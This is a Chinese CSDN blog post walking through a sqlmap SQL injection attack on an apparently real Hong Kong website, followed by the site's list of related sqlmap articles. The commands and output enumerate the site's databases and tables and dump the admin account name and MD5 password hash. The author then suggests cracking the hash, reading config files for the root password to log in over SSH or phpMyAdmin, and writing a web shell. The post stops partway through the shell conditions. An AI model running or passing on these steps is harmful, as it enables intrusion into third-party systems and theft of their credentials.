sqlmap mysql root权限 执行命令_实例sqlmap进行mysql注入root权限读写文件

最新推荐文章于 2023-09-28 11:01:49 发布
最新推荐文章于 2023-09-28 11:01:49 发布
阅读量805 收藏 1
点赞数
文章标签: sqlmap mysql root权限 执行命令
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42311115/article/details/113571018
版权

1.在BT5 R2下root@bt:/sqlmap# python sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 -f -b --current-user --current-db -v 1 /*获取当前用户和当前数据库

返回结果 :

[02:42:20] [INFO] fetching current user current user: 'root@localhost' [02:42:21]

[INFO] fetching current database current database: 'wepost'

//当前用户为 root 当前数据库为 wepost

2.root@bt:/sqlmap# python sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbs -v 2

//获取所有数据库 返回结果 : available databases [8]: [*] bb [*] cart [*] information_schema [*] mysql [*] taipotour [*] test [*] wepost [*] wepost2 看结果可以也可以知道 当前存在8个数据库

3.root@bt:/sqlmap# python sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --tables -D wepost -v 2

//获取wepost数据库(也就是当前数据库)的所有表名 返回结果 : Database: wepost [6 tables]| admin | | article | | contributor | | idea | | image | | issue |看结果可以也可以知道 存在6个表

4.root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --columns -D wepost -T admin -v 2

//获取wepost数据库里admin表的字段 返回结果 : Database: wepost Table: admin [4 columns]|id|int(11)|password|varchar(32)|type|varchar(10)|userid|varchar(20)看结果可以也可以知道 存在4个字段

5.root@bt:/sqlmap# python sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dump -D "wepost" -T "admin" -C "userid,password" -s "sqlnmapdb.log" -v -v 2

//获取wepost数据库里 admin表里 userid和password字段里面的内容 并将数据保存下来 /pentest/database/sqlmap/output/www.wepost.com.hk 返回结果 : Database: wepost Table: admin [1 entry]| password | userid | |7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |

[03:08:51] [INFO] Table 'wepost.admin' dumped to CSV file '/pentest/database/sqlmap/output/www.wepost.com.hk/dump/wepost/admin.csv'

[03:08:51] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.wepost.com.hk'

//得到帐号密码|7d4d7589db8b28e04db0982dd0e92189|wepost2010|破MD5找后台去吧。。。

// mysql既然是root权限 当然可以试着写shell或者读文件 (一般读都是读apache配置文件找网站路径 网站配置文件获取root密码尝试社工直接登录linux的ssh或者登录phpmyadmin登录执行sql语句写shell 或者读其他铭感信息) root权限写shell的3个条件:

1、知道站点物理路径

小安w
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlmap修改mysql密码_【WEB安全】SQLMAP获取后台账号密码
weixin_36376992的博客
02-05 755
SQLMAP获取后台账号密码一.SQLmapSQLMap是一个自动化注入工具,其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞,内置了很多绕过插件。支持的数据库Mysql、Oracle、SQL Server等众多数据库。二.常见注入类型ü布尔类型盲注,即可以根据返回页面判断条件真假的注入ü基于时间的盲注,即不能根据返回页面的内容判断任何信息,要用条件语句查看时间的延迟语句是否已执行...
sqlmap mysql root_sqlmap注入mysql和到root权限后怎么样深入
weixin_33281940的博客
01-19 148
碰着一mysql root权限注入点,实验用sqlmap进一步渗透获取更高权限,东亚服务器台湾服务器,详细如下:判定注入点的当前用户和当前数据库./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --current-user./sqlmap.py -u "http://www.nxadmin.com/sql-injectio...
sqlmap工具使用
huangyongkang666的博客
03-21 3571
sqlmap工具使用 1.sqlmap介绍 SQLMAP是开源的自动化SQL注入工具,由Python写成,具有如下特点: 1、完全支持MySQL、Oracle、PostgreSQL、MSSQL、Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix等多种数据库管理系统。 2、完全支持布尔型盲注、时间型盲注、基于错误信息的注入、联合查询注入和堆查询注入。 3、在数据库证书、IP地址、端口和数据库名等条件允许的情况下支持不通过SQL注入点而
Kali渗透学习(2)——sqlmap使用--os-shell添加管理员
weixin_43669969的博客
02-19 1574
Kali渗透学习(2)——sqlmap使用–os-shell添加管理员 首先要使用 --os-shell 来添加管理员用户,数据库要满足以下条件 1.你使用的数据库要有root权限 sqlmap -u “http://xxxx.xxx.xxx/xxx.php?id=x” --is-dbs 2GPC处于关闭状态即magic_quotes_gpc = off,php主动转义的功能关闭 可以通过探...
SqlMap工具使用(超详细-网安(白帽黑客)人员必看!!!)
Jinmindong
09-28 372
SqlMap工具使用(超详细-网安(白帽黑客)人员必看!!!)
sqlmap提权
m0_51822230的博客
05-17 4300
mysql提权 一.os-shell提权 建立os-shell前提条件: ①必须要有dba权限 ②secure_file_priv必须为空,不然无法写入文件 这是secure_file_priv为null的情况下 这是secure_file_priv为空的情况下 ③知道网站的绝对路径 1、首先查看当前用户权限,是dba后进行os-shell建立 2、sqlmap -u “http://192.168.43.194/sqli/Less-1/?id=1” --os-shell 在这里选择网页语言,根据网页
Mysql执行开启root远程访问的sql语句总报错的解决
Oasis
12-08 576
问题背景 在Linux上安装上Mysql后,执行以下代码开启远程登录: GRANT ALL PRIVILEGES ON *.* TO root@"%" IDENTIFIED BY "你的密码" WITH GRANT OPTION; 系统提示: 解决方法 这是由于安装的Mysql版本过高的问题引起的,这种方法在Mysql8.0以后就已经不适用了,故我们需要执行以下的sql语句: CREATE USER 'root'@'%' IDENTIFIED BY '你的密码'; GRANT ALL ON *.* TO
sqlmap_自动化sql注入引擎_None_sqlmap_sql注入_sql_flath1c_vulnerability_
10-02
SQL注入(SQLi)是一种注入攻击,,可以执行恶意SQL语句。它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器。攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页...
sqlmap自动扫描器.zip_sqlmap_sqlmap扫描器_sql工具
09-23
- **文件系统交互**:某些情况下,SQLMap可以读取或写入服务器上的文件,甚至执行服务器上的操作系统命令。 3. **Fox-scan-master**:这个子文件夹可能包含特定的扫描策略或自定义脚本,针对特定环境或目标进行...
SQLmap注入获取Webshell及系统权限研究.pdf
06-08
SQLmap注入获取Webshell及系统权限研究
sqlmap在windows上执行sql注入,利用dvwa靶场.md
05-19
分享一下自己学习sqlmap的过程,因为网上的资源很少,所以就想着写个博客记录一下,同时也分享一下吧。就先讲到这里吧,有问题的可以私信。欢迎大家提意见。
sqlmap sql 注入测试工具
最新发布
03-06
6. `sqlmap_test`文件可能包含的是一个示例测试用例,用户可以参考这个文件学习如何设置和运行SQLMap的测试场景。 总之,SQLMap是一个强大且全面的SQL注入测试工具,对于保障Web应用程序的安全性具有重要作用。熟练...
sqlmap注入教程linux,Linux Sqlmap检测sql注入漏洞工具安装使用教程
weixin_34239861的博客
05-03 482
Sqlmap工具什么是SQLmapSQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)sql注入概述:所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令它是利用现有应用程序,可以通过在Web表单中输入(恶意)SQL语句得到...
sqlmap命令详解
Pitbull2014的博客
12-20 1121
cookie注入sqlmap.py -u 注入点 --cookie "参数" --tables --level 2 POST登录框注入sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data "指定参数" 绕过waf防火墙:sq...
SQLMAP之高权限用户操作
baynk的博客
03-31 3270
0x00 SQLMAP 这个SQLMAP还是有点东西的,虽然在很多时候没有自己写的小东西好使,但是有些功能确实做的不错,好多东西还没精力去研究,看到了就记一笔。 0x01 检查当前用户 用自己的靶场做的测试。 python sqlmap.py -u "http://www.baynk.com/bvwa/vul/sqli/sqli-union-get-num.php?id=1" --os=wind...
sqlmap mysql root_实例sqlmap进行mysql注入root权限读写文件
weixin_29058331的博客
01-19 319
实例sqlmap进行mysql注入root权限读写文件(2012-08-02 16:01:33)注解: 1.在BT5 R2下 sqlmap安装路径为root@bt:/pentest/database/sqlmap# 也可以通过启动快捷方式启动sqlmap root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://www.wepost....
Mysql注入读写文件
zsdddddss的博客
12-25 176
Mysql注入读写文件
sqlmap进行mysql注入root权限读写文件
u013473439的专栏
01-14 5853
1.在BT5 R2下root@bt:/sqlmap# python sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 -f -b --current-user --current-db -v 1 /*获取当前用户和当前数据库   返回结果 :   [02:42:20] [INFO] fetching current user cu
win环境下使用sqlmap写shell + MYSQL提权(默认就是system权限)
weixin_30606461的博客
01-23 1009
今天在来一个mysql提权 (也可以说是默认system权限提的) 在被黑站点找到一个站 先教拿shell是有注入漏洞的 有可能是root权限注入点 可以确定是有注入漏洞的 也得到了 物理路径 这个是很有用的 如果是root权限注入点 那我们可以考虑 写shellD:\wamp\www\js\content.php 有时候物理路径是很有用的上sqlmap注入 使用命令 这个是mys...
SQLMAP神器使用.pdf
01-05
然后,作者分享了基本的SQLMAP命令使用方法。例如,`sqlmap.py -u http://192.168.150.128:81/sql.php?id=1`用于GET方式的注入攻击,而`sqlmap.py -r /1.txt`则表明之前使用Burp Suite抓包工具捕获的数据已保存为1....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值